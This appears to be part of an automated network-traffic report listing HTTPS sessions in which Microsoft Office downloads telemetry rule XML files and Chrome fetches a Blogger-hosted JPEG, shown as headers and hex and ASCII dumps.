                                                                                                                            2024-10-06 11:50:13 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            71192.168.2.64981013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:14 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:14 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:14 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 499
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                            x-ms-request-id: 40323690-a01e-0002-0100-175074000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115014Z-1657d5bbd48xdq5dkwwugdpzr0000000025g00000000fd7f
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:14 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            72192.168.2.64981113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:14 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:14 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:14 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 415
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                            x-ms-request-id: c530354f-501e-0016-5013-17181b000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115014Z-1657d5bbd48wd55zet5pcra0cg00000001w000000000ah67
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:14 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            73192.168.2.64981313.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:14 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:14 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:14 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                            x-ms-request-id: d415a278-e01e-0051-6efe-1684b2000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115014Z-1657d5bbd48p2j6x2quer0q0280000000280000000000579
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:14 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            74192.168.2.64981213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:14 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:14 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:14 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 471
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                            x-ms-request-id: 7cec3a6f-e01e-0033-3414-174695000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115014Z-1657d5bbd48t66tjar5xuq22r800000001ug00000000eks8
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:14 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            75192.168.2.64981413.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:14 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:14 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:14 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 494
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                            x-ms-request-id: 7c825ef0-601e-0001-5f02-17faeb000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115014Z-1657d5bbd48xdq5dkwwugdpzr000000002bg0000000006au
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:14 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            76192.168.2.649815142.250.185.1934436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:14 UTC671OUTGET /img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZtysRgex-gqs0Czc9ch_O7U2lrucgBVSqGQEL33BwV3Ri4D3evjzJHJ6LBFa_K-pIPbdO6QQ3iHlTkLiqo_w2z2NbXTw83lNcWHG7T9q2n6m7N3SZ-qfZpTdsioS3dm-YIfJh4zU16QEODOLKn/s16000/AddText_06-06-08.17.04.jpg HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:15 UTC483INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/jpeg
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v73b"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:15 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="AddText_06-06-08.17.04.jpg"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:15 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 56391
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:15 UTC907INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 6c 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 03 00 31 01 02 00 07 00 00 00 32 00 00 00 12 02 03 00 02 00 00 00 02 00 02 00 69 87 04 00 01 00 00 00 3a 00 00 00 00 00 00 00 47 6f 6f 67 6c 65 00 00 03 00 00 90 07 00 04 00 00 00 30 32 32 30 02 a0 04 00 01 00 00 00 57 02 00 00 03 a0 04 00 01 00 00 00 ed 00 00 00 00 00 00 00 ff e2 02 28 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 18 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: JFIFlExifII*12i:Google0220W(ICC_PROFILE0mntrRGB XYZ acsp-
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 13 31 22 41 51 09 14 61 81 91 92 d1 16 32 52 71 72 a1 d2 e2 15 23 42 43 62 c1 f0 17 19 53 63 a2 b1 e1 33 0a 24 25 26 27 f1 18 34 37 c2 1a 28 36 45 82 94 b2 d4 ff c4 00 1e 01 01 00 03 00 02 03 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a ff c4 00 57 11 00 01 03 02 04 02 05 06 08 08 0b 06 05 04 03 00 01 02 03 11 04 05 00 06 21 31 12 41 07 13 51 61 71 14 15 22 81 a1 f0 08 18 23 42 91 b1 c1 d1 16 32 52 53 54 62 92 e1 24 25 26 33 34 35 45 46 56 66 96 36 43 55 76 d6 f1 09 72 82 a2 d2 44 86 93 a6 b5 b6 c2 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 c0 f8 61 86 3f a2 0f 51 f6 7d fe f0 7b a7 f9 cf c3 0c 30 c3 d4 7d 9f 7f bc 1e e9 61 86 18 61 ea 3e cf bf de 0f 74 b0 c3 0c 41 bf 75 bd 62 ff 00 cc 62 01 24 09 11 ef e3 ef cf 12 e8 4c a8 2b 54 c2 67 7e
                                                                                                                            Data Ascii: 1"AQa2Rqr#BCbSc3$%&'47(6EW!1AQaq"#B2RSTb$%&345EFVf6CUvrD?a?Q}{0}aa>tAubb$L+Tg~
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: dd 28 ae 29 7d 74 75 34 f5 4d b1 5b 55 6f 5b 94 cf b7 50 81 59 44 ef 51 59 4a a5 36 4a 53 51 48 fc b1 52 c9 3c 6c 3c 95 34 e8 43 89 29 1c ea bb 6d 5d 09 69 35 6c 3d 4c b7 a8 e9 6b db 45 43 2e b2 b5 51 56 b5 d7 d2 55 04 ad 21 46 9e a5 af 94 a7 78 0e 07 db 87 1a 2b 6d 41 47 eb 86 32 b6 70 64 ae 61 64 35 55 0f 44 e6 6c b6 06 4f 53 45 d3 f2 4a ae 1e 5f 01 38 96 cf 1b f9 3d 51 42 26 2a 4f 1c f4 6c ad e7 e0 db 76 32 d1 28 10 ad bc f3 8d 79 b2 d4 f1 6f 5b 61 78 a7 d4 6f bd c5 b7 16 eb 71 dd 6b 1b f8 5b 7c 56 d5 78 b7 5f 2d f4 d7 6b 45 5d 2d ca db 58 16 aa 5a ea 1a 96 6a e9 2a 12 db ce d3 ad 4c d4 d3 2d d6 1d 48 79 97 5b 96 dc 50 e2 42 84 c8 20 72 2e 76 4a fb 2d 7d 4d ae ed 4d 53 6c b9 52 14 26 aa 86 be 99 ea 3a ca 72 b6 5a a8 40 7e 9a a1 2d bc ca 94 cb ed 38 12
                                                                                                                            Data Ascii: ()}tu4M[Uo[PYDQYJ6JSQHR<l<4C)m]i5l=LkEC.QVU!Fx+mAG2pdad5UDlOSEJ_8=QB&*Olv2(yo[axoqk[|Vx_-kE]-XZj*L-Hy[PB r.vJ-}MMSlR&:rZ@~-8
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: ba 86 78 70 92 9d 1b a4 a8 ee 92 ad 93 62 42 74 10 52 74 13 74 aa e9 0d 80 42 94 01 b9 05 ad ed 37 eb 25 fd b5 d4 e5 fb cd a6 fb 46 df 0a 57 55 68 b8 d2 d7 b6 87 56 4f 0b 6e 79 32 dc ea d4 52 95 14 85 28 15 70 ac 25 27 81 51 9d c2 cf 78 b3 3e 29 6f b6 8b 95 92 ac 93 14 b7 3a 2a 8a 37 88 4c 05 a8 25 f6 db 24 20 a8 05 46 dc 48 24 80 a0 71 1f cb 63 f5 8e a3 d5 86 32 7d 0f 93 f5 e6 63 d2 79 9d 5a 52 52 d8 08 ca 7f 27 69 61 5a 57 71 11 73 79 7c ba 26 59 4d 25 c8 84 bd 31 85 86 8a 5b 6f cd 4b 0a 87 7b 9a c4 1a 1d 7e c5 a6 f6 53 ad 03 8c 0d c1 52 4a 4d d2 48 55 8a 48 04 5b be fb 8d c1 07 a1 04 11 b1 18 de 9e e7 47 53 55 59 42 d5 45 3b b5 96 e5 d2 b5 70 a6 69 e4 ad fa 27 2b 69 51 59 48 9a a6 a1 2e d3 aa aa 99 62 a2 99 2f 21 b5 bd 4e 50 fa 51 d5 ad 24 e6 f5 ba a9
                                                                                                                            Data Ascii: xpbBtRttB7%FWUhVOny2R(p%'Qx>)o:*7L%$ FH$qc2}cyZRR'iaZWqsy|&YM%1[oK{~SRJMHUH[GSUYBE;pi'+iQYH.b/!NPQ$
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 40 50 22 e7 63 d1 40 ea b9 04 5d 57 f9 a4 58 ed 71 6e 51 7d 20 c1 43 83 49 24 a6 20 18 82 41 32 06 b1 26 04 8d 09 c7 5c 92 a5 36 12 15 2a 27 f1 82 a7 62 09 d4 19 90 0c 46 f8 8c 31 02 e4 5c 0b f7 12 08 02 f7 22 dd a2 0d ce c6 dd 6c 45 fa e2 aa 58 49 21 56 49 1a 09 0a 20 28 a5 c2 43 5a 53 70 a5 17 48 d2 dd 81 0b 57 65 37 c5 45 4b 44 28 95 00 12 40 51 24 68 4e c0 8d f5 e5 a4 98 3a 63 92 a6 49 e0 21 cd 77 29 01 42 7f 16 41 02 74 df f1 a2 35 c5 f0 c6 41 af b2 be bd cb 43 4d 9a e6 93 9a 52 a9 ab a4 4d 54 b4 e7 e9 2e 4a 84 de 47 12 e1 43 33 18 55 b2 e3 80 b0 a5 1e 5a 52 bd 0e 02 83 ad 3a 82 c8 c7 a4 02 40 bf 66 e6 f6 00 f7 91 df 6d ff 00 6b a7 7e f6 56 c2 b4 b5 d4 95 ec a6 a6 86 a1 8a ca 75 97 12 8a 8a 67 9a 79 95 a9 a7 0b 4e 25 2e 21 65 2a 2d ba 95 b4 e0 04 f0
                                                                                                                            Data Ascii: @P"c@]WXqnQ} CI$ A2&\6*'bF1\"lEXI!VI (CZSpHWe7EKD(@Q$hN:cI!w)BAt5ACMRMT.JGC3UZR:@fmk~VugyN%.!e*-
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: fa f7 25 64 2b 2a f2 fd 1d 26 67 b6 59 1b bb 5e 7a 39 cc b9 e2 c7 53 6d 73 37 55 66 6f 36 d0 58 ae 77 8b 2d ca f0 fb 15 ff 00 81 d6 3b 5b 9e 6e 62 9d 09 ad a2 42 1f a7 71 61 fa 8a 7a d7 85 5a 78 59 95 bc 37 e5 40 c8 b6 38 87 cf fc cf a9 e8 aa 1e 71 5e 44 e5 f5 25 2a cb ca 41 8a da 7f 37 9e ca a1 dd 8e 9a 44 ce 53 36 8e 93 4a 64 70 d0 d0 c0 b4 c3 2f c4 ba eb eb 48 5a 79 a9 88 f3 63 89 f3 8e 8f e1 e6 57 2d a6 66 19 07 9a 15 cd 77 11 31 33 5f 94 92 9a f6 8a 82 a5 22 e4 2c 4b d2 cf 99 c4 32 e4 b2 6b 35 62 3d 33 52 62 1c 65 98 55 c4 08 36 da 5a e6 2f c2 a3 96 b7 72 76 48 71 19 9f 39 1f 47 c7 53 2c e5 b4 b7 33 b2 2e aa 9f be ec fe 81 cc 6a 26 3a a7 a0 a7 15 04 b8 bf 0e f4 5c 03 8c c2 95 ca a7 f0 ce 34 a4 39 15 2e 8e 85 71 6a 97 43 ad e6 1f 2c ba a5 e4 be 2c f2
                                                                                                                            Data Ascii: %d+*&gY^z9Sms7Ufo6Xw-;[nbBqazZxY7@8q^D%*A7DS6Jdp/HZycW-fw13_",K2k5b=3RbeU6Z/rvHq9GS,3.j&:\49.qjC,,
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 86 6e 15 72 c9 91 4b ac 25 2b e6 2c 12 a5 38 d7 8c f4 01 9d ab da ca 14 94 37 ba ea cc bf 69 c9 d9 16 ae f9 64 b4 06 69 9c fc 2b b5 9b e5 da a2 ff 00 99 9d 79 69 72 a6 a1 9b 43 f4 af 5a 58 b7 51 06 97 48 5d 45 5d c7 ab 76 e1 46 19 f2 7f 84 1e 4b a1 39 ca be eb 65 a1 a7 cc 77 3c d7 9d 68 ec 97 9b 92 5c ab 42 32 ad c4 65 eb 2b 76 3c b8 d5 2b 2b 4b 08 aa bb 30 fb 57 47 2e 15 e5 c6 6a 83 0e 50 da 94 ea 28 2b 9c 73 2c 51 59 35 c0 95 45 50 52 d4 2c cf 89 6c da 7e a9 a9 a2 65 f2 bf 94 b2 ac a0 62 0e 82 85 9d 4e 55 e6 f0 b0 eb 5c ce 6c d4 e9 10 ac 47 01 0a b7 7c c1 b6 cc 4a 9a 0b f3 78 67 12 f3 78 96 aa e1 8e 67 96 fc 59 a7 86 1a e2 67 a9 f8 7c c3 91 52 71 13 f9 4f 24 79 f4 9e 7a e4 33 f2 b9 ac 23 0a 72 25 30 91 13 49 64 7c 14 4b 70 f1 0e 29 72 f5 3c a4 c4 b6 bd
                                                                                                                            Data Ascii: nrK%+,87idi+yirCZXQH]E]vFK9ew<h\B2e+v<++K0WG.jP(+s,QY5EPR,l~ebNU\lG|JxgxgYg|RqO$yz3#r%0Id|Kp)r<
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: d0 e4 6f ab 2c b9 db 39 e6 ac bd d1 26 5a b9 e7 cb ae 5e a7 cc 79 9b a5 0c bd 7b ce 74 cb b7 51 dd ab 5c c8 f5 6b fc 15 b5 3b 5b 51 4c b6 69 6e 57 b4 20 f5 f5 2d 36 d5 55 c0 d1 ba 86 01 75 6b 50 f6 65 ef 27 64 9c af 79 e9 47 35 d1 e4 9b 3d f2 a6 c1 93 3a 2c cd 76 3c 93 5a 6e 75 56 6a 04 e7 ba 0a 67 33 65 e1 14 b4 55 b4 d5 55 76 6c b6 fd 43 6d b1 4c ed 53 b4 b4 22 e3 4a ba a7 0a 12 d7 17 10 38 c2 e0 ef 2b b2 f3 2a e8 0e 27 38 67 aa 6a 0a d3 87 bc c5 8d 76 50 96 ea 94 a1 ca 8a 91 9a 91 10 da 20 a6 ae 2c 33 17 15 0f 17 1d 05 33 97 a5 2f c0 b7 13 0b 19 02 e3 2f a5 70 ae 42 c5 bd c9 78 5e 10 f8 1a a1 f8 5e e1 cf 89 9c fa a8 73 16 9a 97 d7 b2 27 5a 9f 53 74 74 63 b3 19 8d 7f 55 45 c5 ba 60 1a a7 e1 de 86 88 5d 3d 05 2e 97 48 e6 11 d3 26 79 81 11 0d 4d 4c 3b 2f
                                                                                                                            Data Ascii: o,9&Z^y{tQ\k;[QLinW -6UukPe'dyG5=:,v<ZnuVjg3eUUvlCmLS"J8+*'8gjvP ,33//pBx^^s'ZSttcUE`]=.H&yML;/
